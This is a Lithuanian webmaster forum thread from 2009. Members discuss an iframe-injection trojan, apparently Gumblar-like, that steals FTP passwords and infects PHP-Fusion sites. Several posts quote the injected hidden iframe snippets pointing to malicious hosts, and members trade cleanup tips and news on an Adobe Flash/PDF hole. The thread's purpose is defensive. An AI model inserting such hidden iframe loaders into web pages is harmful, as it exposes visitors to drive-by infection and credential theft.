Pradinis
Pagalba
Užsisakyk!
- Reklamą
- Hostingą
- El. pašto dėžutę
Užsisakyk!
Įrankiai
Pasidalink
- Visos temos
Forumas | Kita | Portalo informacija |
Puslapis 1 iš 2 | 1 | 2 |
Autorius: ozzWANTED | Peržiūrų: 57153 |
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Taigi, norėčiau informuoti, kad internete pasklido backdoor trojanai. Principas - užkrečiami Jūsų tinklapio failai. Užkrėtimų pavyzdys: <iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi115" width=125 height=125 style="visibility: hidden"></iframe> Bei: echo "<iframe src=\"http://fabujob.com/?click=[ID]\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; Redirectas pirmojo adreso eina į: http://xb5.ru:8080/index.php Per kelias pastarasias dienas sugebėjau patekti į 3 LIETUVIŠKUS taip apkrėstus saitus. Bijau dabar sumeluoti, bet n-design.lt buvo tame sąraše irgi. Kaip suprantu backdoor'as išnaudoja kartu ir Internet Explorer 7 ( o gal ir 8) saugumo kažkokią tai spragą, tad nerekomenduočiau eiti į nepatikimus saitus su IE7 artimiausiu metu. Jeigu visgi tai padarysite, rizikuojate apskrėsti Malware virusu, iš serijos: wpv[number].exe arba: _ex-68.exe Kaip softą naikinantį šiuos virusus rekomenduočiau išbandyti: malwarebytes anti-malware NOD32 viruso tinkamai pašalinti nesugeba. BR#1, Most Wanted Redagavo ozzWANTED 2009 Rugp. 2 21:08:52 |
|
MAnjack Garbės narys Legenda Pranešimai: 11821 Įstojęs: 2006 Kov. 2 20:03:58 | |
Reikėjo geriau parašyti kaip apsisaugoti nuo tokių virusų |
|
mNm. Narys Tankas Pranešimai: 2039 Įstojęs: 2008 Rugp. 28 00:08:02 | |
Jooo, draugas prašė išnaikint padėt tai locale failuose (ne vien locale) būna jis aš atkurdavau eilutes su default fusion'o failas. Ir chmod 444 bereods. nolife.lt / c-s.lt |
|
MAnjack Garbės narys Legenda Pranešimai: 11821 Įstojęs: 2006 Kov. 2 20:03:58 | |
Būtų įdomu sužinoti ar chmod 644 tikrai veikia. Aš kažkam siūliau šitą variantą, bet efektyvumo tai ir neparašė ;D |
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 | |
Nuo šito VIRUSO apsisaugoti galima labai paprasta. Tiesog reikia kad jūsų FTP kliente neįsimintu slaptažodžio, kadangi šitas virusas veikia ir ieško po visas FTP programas slaptažodžius kurios programos įsimina. AVG šita virusa pašalina tinkamai jei ką domina. |
|
Žmogus Narys Viršesnis už Dievą Pranešimai: 5621 Įstojęs: 2006 Gru. 8 17:12:08 | |
Kai ateinu į saitą ir pamau, kad nuo višaus yra labai didelis tarpas jau suprantu, kad apkrėtas, dažniausiai būna, maincore.php pačiam gale, locale/ forum/main.php admin/main.php dar index.php |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
O gal kas žinot ar yra ant IE bugfix'as koks, kad pataisytų šitą malware. Ir gal kas žinot listą programų kurias patikrina, t.y. pvz. ar FZ senesnes versijas ir pan? BR#1, Most Wanted |
|
mNm. Narys Tankas Pranešimai: 2039 Įstojęs: 2008 Rugp. 28 00:08:02 | |
ozzWANTED parašė: O gal kas žinot ar yra ant IE bugfix'as koks, kad pataisytų šitą malware. Ir gal kas žinot listą programų kurias patikrina, t.y. pvz. ar FZ senesnes versijas ir pan? Abejoju ar dabar yra IE fix'as. Vėliau webmasteriai pastebėję šį virusą, padarys ir fix'ą. ( O gal jau jį kuria. ) nolife.lt / c-s.lt Redagavo mNm. 2009 Lie. 25 21:07:00 |
|
sigitas123 Narys Pulkininkas Pranešimai: 426 Įstojęs: 2009 Lie. 6 23:07:35 | |
Jo kaip ištrinti tą virusą draugo saite pasklido tai užblockino mozilą |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
1.Pašalink virusą iš kompo. 2.Pasikeisk visus FTP ir Direct Admin slaptažodžius. 3.Atsiųsk saito failus ir pašalink užkrėstą kodą. BR#1, Most Wanted |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
http://www.delfi.lt/news/economy...d=23184420 ".. „Kaspersky Lab.“ saugumo ekspertai perspėja apie naujo tipo kompiuterių kenkėjų, kurie pasinaudoja nekaltais interneto portalais, bangą. Jie sparčiai plinta, nes išnaudoja ir „Google“ paieškos sistemą. „Kibernetiniai nusikaltėliai braunasi į nepakankamai apsaugotas interneto svetaines, kurias paverčia virusų skleidėjomis. Virusu vartotojas gali užsikrėsti tiesiog apsilankęs užgrobtoje svetainėje“, – pranešime spaudai cituojamas programinės įrangos platintojo „Atviros informacinės sistemos“ saugumo specialistas Andrius Šaveiko – „Per naršyklę iš tinklalapio patekęs į vartotojo kompiuterį, kenkėjas renka konfidencialią informaciją ir prisijungimo prie FTP serverių duomenis, kad galėtų apkrėsti kitus tinklalapius. Taip užgrobtų svetainių ir kompiuterių ratas sparčiai plečiasi“. Pavojingiausias ir plačiausiai žinomas toks per interneto svetaines plintantis kenkėjas – Trojos arklys „Gumblar.a“. Jis per birželio mėnesį plito devynis kartus aktyviau nei gegužę ir užkrėtė daugiau nei 27 tūkst. interneto svetainių. Nuo šio kenkėjo nukentėjo pačios įvairiausios paskirties svetainės – verslo įmonių, restoranų, nevyriausybinių organizacijų, asmeniniai ir kiti tinklalapiai. Pasak A. Šaveiko, „Gumblar.a“ virusas savo plitimui išnaudoja ir „Google“ paieškos sistemą. Jis apkrėstą svetainę optimizuoja taip, kad ji būtų pateikiama kuo aukštesnėje „Google“ paieškos rezultatų pozicijoje, o dėl to daugiau vartotojų, paspaudę nuorodą, patektų į nesaugius tinklalapius bei apkrėstų savo kompiuterį. „Kai šį Trojos arklį pasigauna vartotojas, yra daug šansų, kad jis gaus visą „puokštę“ kitų virusų. Kenkėjas taip pat užblokuoja antivirusines programas ir priėjimą prie jų tinklalapių, o kompiuteryje įrašo netikrą antivirusinę programinę įrangą“, – aiškino „Atviros informacinės sistemos“ specialistas. „Be to, apkrėsto kompiuterio vartotojas „Google“ paieškos sistemoje uždavęs vienokią užklausą, bus nukreipiamas į visai su užklausa nesusijusius rezultatus, vedančius į kitus užkrėstus tinklalapius“. Ekspertų vertinimų, „Gumblar.a“ ir kiti analogiški kenkėjai yra pakankamai bjaurūs ir pavojingi, ypač jeigu ir toliau išlaikys dabartines plitimo tendencijas. Neturinčiam tinkamos saugumo programos vartotojui gali tapti pavojinga užsukti net į gerai pažįstamus tinklalapius, kuriuose lankėsi vakar, nes jie jau gali būti apkrėsti. Be to, kenkėjai renka konfidencialią vartotojo informaciją, prisijungimo prie bankų kodus ir pan. .." ©Delfi.lt BR#1, Most Wanted |
|
manex Narys Kapitonas Pranešimai: 805 Įstojęs: 2008 Sau. 23 19:01:39 | |
Čia ne vienintelis toks yra man pasitaikė ir kitas kuris įdedą į index.php failus pačiame gale tiesiog automatiškai prisirašo ir tu nežinai iš kur jis atsirado. Na, o pats kodas atrodo taip: require_once "side_right.php"; ><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe> paryškinau ta kodą kuri įdeda į index.php, nesvarbu ar jis yra prirašytas ar tuščias tiesiog ji prirašo. Na, o aš juos išnaikinau tiesiog peržiūrėdamas visus index.php failus ir tuos kodus ištryniau. |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Ne tik į index.php, bet ir į kitus įsirašo, ir ne tik tokiais URL. Tiesiog reiktų Notepad++ su "find in files" <iframe paieška duoti per visus saito failus. BR#1, Most Wanted |
|
manex Narys Kapitonas Pranešimai: 805 Įstojęs: 2008 Sau. 23 19:01:39 | |
Pas mane buvo vienas tarp kas kokio kito failo, bet neprisimenu, o php-fusion failus pražiūrėjau visus tai tik toks kodas te buvo ir tarp index.php failų. |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Aš tai apskritai šiandien labai supykau ant MicroSHIDO kad jis sugeba tokias milžiniškas security holes palikti ant savo softo.... BR#1, Most Wanted |
|
Alchašas Narys Fruktas Pranešimai: 27 Įstojęs: 2008 Bir. 2 12:06:30 | |
Pamačiau temą ir juoktis pradėjau... Šitas virusas siaučia jau geri 3mėnesiai tik antvirusinės updeit'ų šitam neturėjo tik prieš mėnesį juos įsirengė, bet visgi matau kaip visad neupdeitinat antvirusinių. Aš į php-f saitus jau net nevaikštau nes kas 3saitas sėdi su tokiu virusiuku. |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Bent jau nod'o 32 net naujausia versija negaudo laiku kai reikia. Praleidžia infiltruotis į sistema. Ir išnaikinti NOD nesugeba gerai manau. Malwarebytes' Anti-Malware šitas gerai naikina. BR#1, Most Wanted |
|
Alchašas Narys Fruktas Pranešimai: 27 Įstojęs: 2008 Bir. 2 12:06:30 | |
Nežinau kaip tau čia taip, bet turiu AdAware kuris puikiai išnaikina, o ponaitis ESS 4 perspėja kada reikia pasinaudoti geriausiu desktop draugu AdAware. |
|
dyaz Narys Tankas Pranešimai: 1748 Įstojęs: 2008 Vas. 6 18:02:39 | |
manex parašė: Čia ne vienintelis toks yra man pasitaikė ir kitas kuris įdedą į index.php failus pačiame gale tiesiog automatiškai prisirašo ir tu nežinai iš kur jis atsirado. Na, o pats kodas atrodo taip: require_once "side_right.php"; ><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe> paryškinau ta kodą kuri įdeda į index.php, nesvarbu ar jis yra prirašytas ar tuščias tiesiog ji prirašo. Na, o aš juos išnaikinau tiesiog peržiūrėdamas visus index.php failus ir tuos kodus ištryniau. Man kažkas panasaus buvo atsiradę maincore.php faile |
|
Alchašas Narys Fruktas Pranešimai: 27 Įstojęs: 2008 Bir. 2 12:06:30 | |
Taigi jis lenda į visur kas susiję su index.php šiuo atveju index.php>maincore.php |
|
andriuxa Narys Generolas Pranešimai: 920 Įstojęs: 2008 Lie. 5 20:07:26 | |
as galvojau kas per sudas su mano webu darosi... visada sugadintas index.php maincore.php forum/index.php ir administratio/index.php ir visuose buna iframe <iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi115" width=125 height=125 style="visibility: hidden"></iframe> dabar viskas aisku aciu uz info dabar zinosiu Redagavo andriuxa 2009 Lie. 26 00:07:17 |
|
dyaz Narys Tankas Pranešimai: 1748 Įstojęs: 2008 Vas. 6 18:02:39 | |
Man susigadindavo mainteriance pastoviai... žinostim, žinosim. |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Dar daugiau informacijos: Symantec oficialiai pranešė, kad egzistuoja kritinis Adobe flash pažeidžiamumas. Situacija yra gan rimta kadangi hakeriai šį pažeidžiamumą gali labai lengvai išnaudoti tiesiog reikia auką priversti atsidaryti užkrėsta tinklapį arba atidaryti el.paštu gauta .PDF formato failą. Simantec taip pat teigia, kad pažeidžiamumą galima išnaudoti su betkuria programine įranga kuri naudoja flash elementus. Oficialiame Adobe blog'e teigiama, kad pažeidžiamumas egzistuoja šiuose Adobe produktuose : Adobe Reader, Acrobat 9.1.2, Adobe Flash Player 9, Adobe Flash Player 10. Adobe šiuo metu dirba prie šio pažeidžiamumo ir galime tikėtis, kad greitu metu išleis pataisymų paketus šioms versijoms. Symantec praneša, kad trojanas pavadinimu Trojan.Pidief.G būtent ir plinta pasinaudodamas šiuo flash pažeidžiamumu. Operacinės sistemos kurios gali būti infekuotos šiuo trojos arkliu yra : Windows XP ir Windows Vista jei yra išjungtas User Account Control (UAC). Jei norite laikinai apsisaugoti yra rekomenduojama atlikti šiuos veiksmus:
Rekomendacija: Nepatartina atidarinėti jokių neaiškių .PDF formato failų ar lankytis nuorodose su .pdf galunėmis pavyzdžiui: http://www.blogas_tinklapis.com/failas.pdf Pagal ©KING BR#1, Most Wanted |
|
Rytis Narys Tankas Pranešimai: 2258 Įstojęs: 2006 Sau. 13 17:01:49 | |
Nenaudoti IE. Nenaudoti MS produkcijos. Nesukti sau galvos. |
|
manex Narys Kapitonas Pranešimai: 805 Įstojęs: 2008 Sau. 23 19:01:39 | |
Na čia nieko nepadarysi nors ir tu antivirusine atsinaujinsi. Pavyzdžiui pas mane yra AVG ir AVG IDENTITY Protection beto dar yra užsakyta teo triguba apsauga na nežinau ar ji padeda ar ne bet kartais ir neileidžia į kai kuriuos tinklapius rašo, kad tinklapis yra nesaugus tai ir neįeisi |
|
Fortke Narys Žalias Pranešimai: 16 Įstojęs: 2009 Lie. 21 15:07:56 | |
O tai sakykit, kaip mynejo cia kad nod32 neisvalo to virsuo, tai net nevalyti su nobu? ka daryti tada? su kitokia anti-virus programa valyti? ar kaip? |
|
ozzWANTED Administratorius Legenda Pranešimai: 8478 Įstojęs: 2006 Gru. 29 14:12:31 | |
Buvo juodai boldu parašyta. Dar kartą kartoju. Šį trojaną išvalo ši programa: malwarebytes anti-malware Atsisiųsti ją gali iš: http://www.malwarebytes.org/mbam... Užtenka atsisiųsti FREEWARE versiją. Instaliavę darykite FULL systemą scan'ą. BR#1, Most Wanted |
|
Alchašas Narys Fruktas Pranešimai: 27 Įstojęs: 2008 Bir. 2 12:06:30 | |
Durni ar kaip? Sakau pasakiau kas gali būti naudinga, bet žiūriu mano patarimais nesinaudojama. So WTF I was writing and trying to help you guys? |
|
CodeRS Narys Patrankų mėsa Pranešimai: 3 Įstojęs: 2007 Rugp. 14 01:08:53 | |
Šis trojanas nepriklausomai nuo naršyklės įlenda į jūsų kompiuterį per PDF. Jeigu naršyklė PDF failus atidarinėja viduje ir jeigu neturite antivirusinės - tai galimas daiktas, kad jūs jau esate užsikrėtę. Kažkada gavau laišką su pranešimu, kad per Adobe Acrobat Reader (PDF Readeris) turi rimtą spragą. Reikia išjungti JavaScript'ą PDF readeryje (Preferences > Advanced > JavaScript). Aš tai išgirdęs tiesiog išinstaliavau šitą programą ir atsisiunčiau kažkokia tai FREE. Tai jei užklysdavau į tokią ifreimais užkrėstą svetainę man tiesiog blogiausiu atveju pasileisdavo tas PDF skaitytuvas su hieroglifais vietoje teksto. O kaip išssigydyti nuo jo? Tiesiog dabar jau betkokia antivirusinė manau susidoroja su šiuo virusu. Po praskanavimo pasikeiskite visus savo žinomų FTP slaptažodžius. Nes tas trojanas renka ftp paswordus ir vėliau prisijungia prie jūsų hostingų ir redaguoja failus įkišdamas tuos iframe. Žiauriausia buvo kaip tokiu trojanu užsikrėtė vienas iš adminu textadds sistemos. Tai automatiškai visi vartotojai kurie naudojosi ta reklamų apsikeitimo sistema tapo trojano platintojais. Sėkmės |
|
dyaz Narys Tankas Pranešimai: 1748 Įstojęs: 2008 Vas. 6 18:02:39 | |
Kai iejnu i savo tinklapi reguoja flash playeris... |
|
cipis Narys Kapitonas Pranešimai: 539 Įstojęs: 2008 Lie. 22 15:07:02 | |
---> Sveiki Stai. Jau koki 1menesi laiko kankinuosi su 1 ikirus virusau, istrinu ir vel po keliu dienu atsiranda... Keiciau ftp pas ir t.t Gal kas patars ka daryti? Duodu viruso pavizdi Cia nespauskit, Virusas <iframe src="http://xc7.ru:8080/index.php" width=147 height=192 style="visibility: hidden"></iframe> Counter-Strike 1.6 - NAUJOKAI-LT WWW.NAUJOKAI.NET Perkėlė ozzWANTED 2009 Rugp. 2 21:08:08 |
|
sigitas123 Narys Pulkininkas Pranešimai: 426 Įstojęs: 2009 Lie. 6 23:07:35 | |
---> cipis padeti? duok skype Perkėlė ozzWANTED 2009 Rugp. 2 21:08:08 |
|
cipis Narys Kapitonas Pranešimai: 539 Įstojęs: 2008 Lie. 22 15:07:02 | |
---> O is kur man zinot ar nepakenksi dar labeu? ----------------------------------------------------- Bet nemanau kad gali pakenkt labeu nei yra pakenkta ----------------------------------------------------- Na nebent Pavogtum ftp su 25lt Counter-Strike 1.6 - NAUJOKAI-LT WWW.NAUJOKAI.NET Perkėlė ozzWANTED 2009 Rugp. 2 21:08:08 |
|
sigitas123 Narys Pulkininkas Pranešimai: 426 Įstojęs: 2009 Lie. 6 23:07:35 | |
---> neprašau jokiu duomenu... Man ir taip buvo tai susitvarkiau Perkėlė ozzWANTED 2009 Rugp. 2 21:08:08 |
|
cipis Narys Kapitonas Pranešimai: 539 Įstojęs: 2008 Lie. 22 15:07:02 | |
---> I privacia zinute , skype id Counter-Strike 1.6 - NAUJOKAI-LT WWW.NAUJOKAI.NET Perkėlė ozzWANTED 2009 Rugp. 2 21:08:08 |
|
Majakas Narys Kapitonas Pranešimai: 729 Įstojęs: 2008 Geg. 14 20:05:45 | |
---> Stai koke beda iframe virusas mano saite, tiagi viusus failus persikeliu i PC paskanuoju su AVG ji randa virusus pasalinu tuos failus ir ikeliu naujus bet praejus kokem taj laiko tarpui wel wirusas ATSIRANDA, ka daryt ? Perkėlė ozzWANTED 2009 Rugp. 5 15:08:16 |
|
MAnjack Garbės narys Legenda Pranešimai: 11821 Įstojęs: 2006 Kov. 2 20:03:58 | |
---> Bandyk chmod tuos failus į 444. Perkėlė ozzWANTED 2009 Rugp. 5 15:08:16 |
|
Majakas Narys Kapitonas Pranešimai: 729 Įstojęs: 2008 Geg. 14 20:05:45 | |
---> Warning: require_once(includes/multisite_include.php) [function.require-once]: failed to open stream: No such file or directory in /home/majakas/csfun.xz.lt/maincore.php on line 68 Stai ka dabar raso Perkėlė ozzWANTED 2009 Rugp. 5 15:08:16 |
|
MAnjack Garbės narys Legenda Pranešimai: 11821 Įstojęs: 2006 Kov. 2 20:03:58 | |
---> includes/multisite_include.php failą ištrynei Perkėlė ozzWANTED 2009 Rugp. 5 15:08:16 |
|
Giedrunskis VIP narys Tankas Pranešimai: 1972 Įstojęs: 2007 Sau. 26 14:01:04 | |
---> Pasalink virusus is svetaines, poto is pc o poto pasikeiti visus paswordus Perkėlė ozzWANTED 2009 Rugp. 5 15:08:16 |
Puslapis 1 iš 2 | 1 | 2 |
Peršokti į forumą: |